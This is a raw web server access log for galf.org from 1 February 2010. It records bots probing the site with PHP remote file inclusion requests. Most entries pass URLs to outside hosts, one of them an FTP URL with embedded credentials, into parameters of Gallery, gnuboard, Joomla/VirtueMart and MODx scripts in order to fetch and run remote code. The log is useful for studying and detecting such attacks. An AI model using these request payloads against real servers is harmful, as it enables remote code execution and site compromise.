74.55.15.194 - - [01/Feb/2010:04:12:12 -0800] "GET /index.php?option=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:04:12:14 -0800] "GET /logs/access_091123.log//index.php?option=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:04:12:14 -0800] "GET /logs//index.php?option=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:12:45 -0800] "GET /index.php?pg=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:12:45 -0800] "GET /logs//index.php?pg=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:12:46 -0800] "GET /logs//index.php?pg=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:12:46 -0800] "GET /index.php?pg=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:13:11 -0800] "GET /index.php?pag=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:13:11 -0800] "GET /logs//index.php?pag=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:13:11 -0800] "GET /index.php?pag=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:13:11 -0800] "GET /logs//index.php?pag=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:14:38 -0800] "GET /logs//index.php?pg=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "galf.org"
81.3.150.104 - - [01/Feb/2010:04:14:38 -0800] "GET /index.php?pg=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "galf.org"
81.3.150.104 - - [01/Feb/2010:04:14:38 -0800] "GET /index.php?pg=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "galf.org"
81.3.150.104 - - [01/Feb/2010:04:14:38 -0800] "GET /logs//index.php?pg=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "galf.org"
81.3.150.104 - - [01/Feb/2010:04:15:04 -0800] "GET /index.php?pag=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "galf.org"
81.3.150.104 - - [01/Feb/2010:04:15:05 -0800] "GET /logs//index.php?pag=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "galf.org"
81.3.150.104 - - [01/Feb/2010:04:15:05 -0800] "GET /index.php?pag=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "galf.org"
81.3.150.104 - - [01/Feb/2010:04:15:05 -0800] "GET /logs//index.php?pag=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:15:30 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:15:30 -0800] "GET /logs/access_091221.log%20%20//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:15:33 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:15:33 -0800] "GET /logs//index.php?p=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:15:33 -0800] "GET /index.php?p=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:15:33 -0800] "GET /logs//index.php?p=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:15:34 -0800] "GET /index.php?p=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:16:14 -0800] "GET /logs/access_091221.log//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:16:14 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:16:17 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:04:16:45 -0800] "GET /index.php?p=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "galf.org"
81.3.150.104 - - [01/Feb/2010:04:16:45 -0800] "GET /logs//index.php?p=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "galf.org"
81.3.150.104 - - [01/Feb/2010:04:16:45 -0800] "GET /index.php?p=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "galf.org"
81.3.150.104 - - [01/Feb/2010:04:16:46 -0800] "GET /logs//index.php?p=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:19:27 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:19:27 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:04:19:40 -0800] "GET /errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:04:19:40 -0800] "GET /logs//errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:04:19:41 -0800] "GET /logs/access_090720.log//errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:19:55 -0800] "GET /logs/access_090803.log%20//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:19:55 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:19:58 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:20:17 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:20:17 -0800] "GET /logs/access_090803.log%20//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:20:17 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.3.83.14 - - [01/Feb/2010:04:20:20 -0800] "GET /errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.3.83.14 - - [01/Feb/2010:04:20:20 -0800] "GET /logs//errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.3.83.14 - - [01/Feb/2010:04:20:21 -0800] "GET /logs/access_090720.log//errors.php?error=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:20:50 -0800] "GET /logs/access_090817.log%20%20//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:21:20 -0800] "GET /logs/access.log%20%20/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:21:20 -0800] "GET /logs/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:21:20 -0800] "GET ////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.202.168.81 - - [01/Feb/2010:04:21:22 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
209.202.168.81 - - [01/Feb/2010:04:21:23 -0800] "GET /logs/access_090803.log HTTP/1.0" 200 1114112 "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:21:27 -0800] "GET /logs/access_090803.log%20//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:21:30 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:21:30 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:21:56 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:22:24 -0800] "GET /logs/access_090803.log%20%20//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:22:24 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:22:27 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:22:33 -0800] "GET ////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:22:33 -0800] "GET /logs/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:22:33 -0800] "GET /logs/access.log%20%20/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:23:21 -0800] "GET /logs/access_090921.log/?sourcedir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:23:34 -0800] "GET /logs/access_090803.log//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:23:34 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:23:34 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:24:02 -0800] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:24:49 -0800] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:24:49 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:24:49 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:24:57 -0800] "GET /logs/access_090803.log//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:25:05 -0800] "GET /logs/access_090803.log//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:25:05 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:25:05 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:25:05 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "galf.org"
211.193.131.164 - - [01/Feb/2010:04:25:21 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:04:25:22 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:04:25:24 -0800] "GET /logs/access_090720.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:25:50 -0800] "GET /logs/access_090907.log/?sourcedir=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:26:49 -0800] "GET /logs/access_090803.log//init_basic.php?GALLERY_BASEDIR=http://www.bookmarketingworks.com/db/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:27:39 -0800] "GET /logs/access_100125.log%20%20/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:28:45 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:28:46 -0800] "GET /logs/access_090824.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:28:46 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
210.127.253.75 - - [01/Feb/2010:04:29:13 -0800] "GET /logs/access_091207.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.galf.org"
210.127.253.75 - - [01/Feb/2010:04:29:13 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.galf.org"
210.127.253.75 - - [01/Feb/2010:04:29:14 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.galf.org"
210.127.253.75 - - [01/Feb/2010:04:29:15 -0800] "GET /logs/access_090824.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:29:52 -0800] "GET /logs/access.log/////gnuboard4//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [01/Feb/2010:04:30:53 -0800] "GET /logs/access_090824.log////?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:34:08 -0800] "GET /logs/access_090907.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:34:08 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:34:08 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:34:10 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:34:10 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:34:10 -0800] "GET /logs/access_090907.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:36:51 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:36:51 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:36:51 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:36:56 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:36:56 -0800] "GET /logs/access_090907.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:36:56 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:04:37:28 -0800] "GET /logs/access_090803.log//write_comment_update.php?board_skin_path=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:04:37:28 -0800] "GET /write_comment_update.php?board_skin_path=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:04:37:29 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:39:39 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:39:39 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:39:39 -0800] "GET /logs/access_090907.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:40:04 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:40:04 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [01/Feb/2010:04:40:04 -0800] "GET /logs/access_090907.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [01/Feb/2010:04:40:55 -0800] "GET /logs/access.log///?mosConfig.absolute.path=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.102.237.81 - - [01/Feb/2010:04:40:55 -0800] "GET //?mosConfig.absolute.path=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
66.102.237.81 - - [01/Feb/2010:04:40:55 -0800] "GET /logs///?mosConfig.absolute.path=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
219.240.36.36 - - [01/Feb/2010:04:41:00 -0800] "GET /write_comment_update.php?board_skin_path=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:04:41:01 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [01/Feb/2010:04:41:16 -0800] "GET /logs/access_090720.log//write_comment_update.php?board_skin_path=http://qqe.ru/forum/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
